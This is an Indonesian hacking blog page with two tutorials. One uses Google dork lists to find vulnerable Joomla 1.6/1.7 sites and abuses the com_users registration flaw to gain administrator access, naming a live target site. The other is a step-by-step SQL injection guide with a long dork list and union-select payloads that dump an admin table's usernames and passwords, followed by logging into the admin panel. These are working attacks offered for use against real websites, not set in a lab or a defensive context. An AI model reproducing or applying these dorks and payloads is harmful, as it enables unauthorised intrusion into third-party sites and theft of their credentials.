Java-CyberSpace

Laki-laki, 18 tahun

Jawa, Indonesia

WE ARE ONE, WE ARE FAMILY
::
Start
Windows 8 SM Versi 3
Shutdown

Navbar3

Search This Blog

Sunday, September 29, 2013

shell


Read More --►
Labels:

Friday, September 27, 2013

COM_USER

Hi kawan
pagi ini dari pada bosen di kelas, mending nulis tutor kali aja bermanfaat
sebenernya exploit ini udah lama dan juga banyak yang memakainya :D

berikut list dorknya :

inurl:index.php/using-joomla/extensions/plugins site:.com 
inurl:index.php/using/joomla site:com
inurl:index.php/using-joomla/extensions/components/content-component/article-category-list/50-upgraders 
inurl:index.php/using-joomla/extensions/components/content-component/article-categories/28-park-site/photo-gallery 
inurl:index.php/using-joomla/parameters/26-sample-data-articles/park-site Inurl:index.php/plugins site:com 
Inurl:index.php/rss=feed site:com 
inurl:index.php/joomla/content/category-blog/24-joomla site:com 
inurl:index.php/using-joomla/extensions/components/content-component/article-

categories/84-gd-articles site:com
inurl:Home Page Beez joomla 1.6 index.php using-joomla 
inurl:index.php joomla! 1.7 - open source content management site:

inurl:index.php/using-joomla/extension/components/content-component/article-category-

list/50-upgraders site:com 

 intext:joomla! 1.7 - open source content management site:jp 
inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id 

 inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as 
inurl:index.php/19-sample-data-articles/joomla site:com 
inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-

component/registration-form site:com

 intext:Joomla! is a flexible and powerful platform, whether you are building a small site for

 yourself or a huge site with hundreds of thousands of visitors site:com

 NP: kembangin lagi dorknya :)

 exploit : index.php?option=com_users&view=registration

untuk exploitnya kalian bisa download (here)
langsung ke first step

copas salah satu dork yang tersedia di atas ke google,bing,dll
contoh dork yang saya pakai :

 intext:joomla! 1.7 - open source content management site:jp



pilih salah satu webnya :D

setelah itu masukin exploitnya
http://www.josuerodrigues.com.br/2013v2/index.php?option=com_users&view=registration

setelah itu tekan ctrl + U seperti gambar di bawah :D

edit dulu exploitnya ya :)
ganti email dengan email kalian

setelah itu copas token dan url website tersebut ke exploit yang sudah kalian download
setelah itu di save dan buka di broswer kalian

klik register dan akan muncul seperti ini
password salah
  • The passwords you entered do not match. Please enter your desired password in the password field and confirm your entry by entering it in the confirm password field.

kalian masukin lagi password yang kalian suka kemudian klik register
jika sukses akan muncul seperti ini (ini bhsa brazil :v)

nah setalah itu buka email kalian :D lalu konfirmasi dengan cara klik link yang ada di pesan :)
setelah itu kita coba masuk ke page administratornya :)
dan login dengan user + pass kita tadi, jika sukses maka akan muncul ke page adminnya
nah sekarang terserah kalian mau di apain itu web :)
sekian dari saya
semoga bermanfaat :)

BY. Rastaman Patah Hati
Read More --►
Labels:

Tutorial Hacking with SQL bar

Alat : Browser Firefox . Kenapa harus firefox ? Karena kita harus menginstall addons HACKBAR yang [sepertinya] hanya ada di Firefox. Hackbar itu seperti apa sih ? Nih screenshotnya ;



Fungsinya ? Simak saja tutorialnya sampai akhir maka anda akan tahu fungsi dari hackbar. Untuk yang belum menginstall hackbar silahkan menuju link berikut :
https://addons.mozilla.org/id/firefox/addon/hackbar/

Oke, kita mulai tutorialnya :

Step 1 :
Dork paste di google :
source.php?id=
dl.php?id=
service.php?id=
anime.php?id=
application.php?id=
plugin.php?id=
purchase.php?id=
report.php?id=
world.php?id=
overview.php?id=
journal.php?id=
static.php?id=
content.php?id=
projects.php?id=
record.php?id=
feed.php?id=
topic.php?id=
display_main.php?id=
blog.php?id=
subcatergory.php?id=
author.php?id=
inside.php?id=
popup2.php?id=
work.php?id=
trailers.php?id=
howto.php?id=
play.php?id=
press_release.php?id=
mirrors.php?id=
interview.php?id=
contribute.php?id=
entry.php?id=
standard.php?id=
country.php?id=
flash_games.php?id=
flash.php?id=
flashgames.php?id=
file.php?id=
skill.php?id=
links.php?id=
form.php?id=
single.php?id=
book.php?id=
node.php?id=
release.php?id=
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: preg_match()
“id=” & intext:”Warning: ilesize()
“id=” & intext:”Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: is_writable()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?* *=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?* *=
info.php?strona=
template.php?str=
main.php?doshow=
view.php?* *=
index.php?to=
page.php?cmd=
view.php?b=
info.php?option=
show.php?x=
template.php?texto=
index3.php?ir=
print.php?chapter=
file.php?inc=
file.php?cont=
view.php?cmd=
include.php?chapter=
path.php?my=
principal.php?param=
general.php?menue=
index1.php?b=
info.php?chapter=
nota.php?chapter=
general.php?include=
start.php?addr=
index1.php?qry=
index1.php?loc=
page.php?addr=
index1.php?dir=
principal.php?pr=
press.php?seite=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
base.php?to=
view.php?choix=
base.php?panel=
template.php?mod=
info.php?j=
blank.php?pref=
sub*.php?channel=
standard.php?in=
general.php?cmd=
pagina.php?panel=
template.php?where=
path.php?channel=
gery.php?seccion=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
path.php?start=
page.php?chapter=
home.php?recipe=
enter.php?pname=
layout.php?path=
print.php?open=
mod*.php?channel=
down*.php?phpbb_root_path=
*inc*.php?str=
gery.php?phpbb_root_path=
include.php?middlePart=
sub*.php?destino=
info.php?read=
home.php?sp=
main.php?strona=
sitio.php?get=
sitio.php?index=
index3.php?option=
enter.php?a=
main.php?second=
print.php?pname=
blank.php?itemnav=
blank.php?pagina=
index1.php?d=
down*.php?where=
*inc*.php?include=
path.php?pre=
home.php?loader=
start.php?eval=
index.php?disp=
head.php?mod=
sitio.php?section=
nota.php?doshow=
home.php?seite=
home.php?a=
page.php?url=
pagina.php?left=
layout.php?c=
principal.php?goto=
standard.php?base_dir=
home.php?where=
page.php?sivu=
*inc*.php?adresa=
padrao.php?str=
include.php?my=
show.php?home=
index.php?load=
index3.php?rub=
sub*.php?str=
start.php?index=
nota.php?mod=
sub*.php?mid=
index1.php?* *=
pagina.php?oldal=
padrao.php?loc=
padrao.php?rub=
page.php?incl=
gery.php?disp=
nota.php?oldal=
include.php?u=
principal.php?pagina=
print.php?choix=
head.php?filepath=
include.php?corpo=
sub*.php?action=
head.php?pname=
press.php?dir=
show.php?xlink=
file.php?left=
nota.php?destino=
general.php?module=
index3.php?redirect=
down*.php?param=
default.php?ki=
padrao.php?h=
padrao.php?read=
mod*.php?cont=
index1.php?l=
down*.php?pr=
gery.php?viewpage=
template.php?load=
nota.php?pr=
padrao.php?destino=
index2.php?channel=
principal.php?opcion=
start.php?str=
press.php?* *=
index.php?ev=
pagina.php?pre=
nota.php?content=
include.php?adresa=
sitio.php?t=
index.php?sivu=
principal.php?q=
path.php?ev=
print.php?module=
index.php?loc=
nota.php?basepath=
padrao.php?tipo=
index2.php?in=
principal.php?eval=
file.php?qry=
info.php?t=
enter.php?play=
general.php?var=
principal.php?s=
standard.php?pagina=
standard.php?subject=
base.php?second=
head.php?inc=
pagina.php?basepath=
main.php?pname=
*inc*.php?modo=
include.php?goto=
file.php?pg=
head.php?g=
general.php?header=
start.php?*root*=
enter.php?pref=
index3.php?open=
start.php?module=
main.php?load=
enter.php?pg=
padrao.php?redirect=
pagina.php?my=
gery.php?pre=
enter.php?w=
info.php?texto=
enter.php?open=
base.php?rub=
gery.php?* *=
include.php?cmd=
standard.php?dir=
layout.php?page=
index3.php?pageweb=
include.php?numero=
path.php?destino=
index3.php?home=
default.php?seite=
path.php?eval=
base.php?choix=
template.php?cont=
info.php?pagina=
default.php?x=
default.php?option=

bisa kalian kreasikan sendiri :D
cotoh website: http://target.com/content/research.php?cid=2
Kita tambahkan tanda kitip satu ['] atau tanda takterhingga [~] di akhri url untuk memastikan apakah webnya vuln SQLi atau tidak.
Sehingga menjadi : http://target.com/content/research.php?cid=2'

Di situ tertulis : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by uid' at line 1 . Error ! Artinya web tersebut vuln SQLi

Step 2 :
Lanjut. Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” . Cari hingga menemukan error.
http://target.com/content/research.php?cid=2 order by 1-- normal
http://target.com/content/research.php?cid=2 order by 2-- normal
http://target.com/content/research.php?cid=2 order by 3-- normal
http://target.com/content/research.php?cid=2 order by 4-- normal
http://target.com/content/research.php?cid=2 order by 5-- normal
http://target.com/content/research.php?cid=2 order by 6-- ERROR

di "order by 6" kita mendapatkan error dengan tulisan : Unknown column '6' in 'order clause'. Sekarang kita sudah tahu kalo jumlah kolom di databasenya ada 5.

Step 3 :
Sekarang kita mulai mencari "angka" yang bisa kita injeksi di step sejanjutnya dengan memasukkan perintah union select. Perhatikan saja url yang saya tulis dibawah :
http://target.com/content/research.php?cid=-2 union select 1,2,3,4,5-- [ ingat, setelah ?cid= diberi tanda - ]


Muncul angka 3 dan 4 .

Step 4 :
Sekarang kita coba untuk melihat versi php dengan angka ajaib tadi. Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi.
http://target.com/content/research.php?cid=-2 union select 1,2,version(),4,5 -- [karena 3 tadi termasuk angka ]

Tertulis 5.1.61 . Versi php 5 . Berarti tutorial ini masih bisa dilanjutkan. Karena jika menemukan php versi 4 kita harus menebak sendiri isi/tabel dari databasenya.

Step 5 :
Kita akan memunculkan nama-nama table yang ada di dalam database dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda --
http://target.com/content/research.php?cid=-2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--

Kita melihat ada table admin, research, vcounter .

Step 6 :
Sekarang main logika disini. Dimana biasanya akan disimpan data berupa user dan password ? Tentu jawabannya adalah di table admin. Kita coba melihat kolom dari table admin tersebut .
Disinilah hackbar dibutuhkan. Untuk merubah suatu kata menjadi bentuk MySQL CHAR(). Caranya : klik tombol SQL -> MySQL -> MySQL CHAR() . Lalu kita convert kata "admin" menjadi bentuk MySQL CHAR() .

Dan hasil convert dari kata admin adalah CHAR(97, 100, 109, 105, 110)

Step 7 :
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah “ group_concat(table_name) ” dengan perintah “ group_concat(column_name) ” dan mengganti perintah “ information_schema.tables “ menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name=[hasil convert MySQL CHAR() - Step 6] ”

http://target.com/content/research.php?cid=-2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns wheretable_name=CHAR(97, 100, 109, 105, 110)--

Kita mendapat kolom aid, admin id, admin pass di tabel admin.

Step 8 :
Sekarang kita coba membuka data yang ada di kolom aid, admin id , dan admin pass .
Caranya ialah mengganti perintah group_concat(table_name) menjadi group_concat(aid,0x3a,admin_id,0x3a,admin_pass) dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ . disitu kita melihat ada tanda 0x3a. Apa maksudnya ? 0x3a adalah bentuk HEX dari tanda sehingga data nanti akan dipisah dengan tanda : .
http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(aid,0x3a,admin_id,0x3a,admin_pass),4,5 from admin--

Kita mendapatkan data berikut ;
aid : 1
Admin ID : admin
Admin Pass : bimogay

Step 9 :
Sekarang kita coba mencari halaman loginnya. Tidak bakal jauh dari kata "admin" ataupun "login" . Kalo malas mencari manual, cari dengan software Admin Finder. Cari sendiri di Google.
Kita menemukan halaman loginnya terletak di :
http://target.com/admin ( kalian bisa mencari page adminnya lewat havij)

Masukkan user dan password sesuai dengan data yang telah kita dapat.
 

Read More --►
Labels:
Subscribe to: Comments (Atom)